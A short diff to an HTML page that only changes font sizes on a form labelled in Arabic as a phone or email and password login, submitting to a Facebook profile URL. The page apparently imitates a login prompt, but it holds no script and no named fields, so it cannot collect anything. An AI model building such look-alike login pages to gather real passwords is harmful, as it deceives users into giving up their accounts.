--- a/index.html
+++ b/index.html
@@ -10,10 +10,10 @@ mazaaaamezoo
 <br>
 <br>
 <form action="https://www.facebook.com/profile.php?id=100083199052824">
-<font color="black" size="5">
-رقم الهاتف أو البريد الاكتروني<br><br><br>
+<font color="black" size="7">
+رقم الهاتف أو البريد الاكتروني<br><br>
 <input type="numper"><br><br><br>
-<font size="6">
+<font size="7">
 كلمة المرور
 <input type="password">
 <br><br><br>
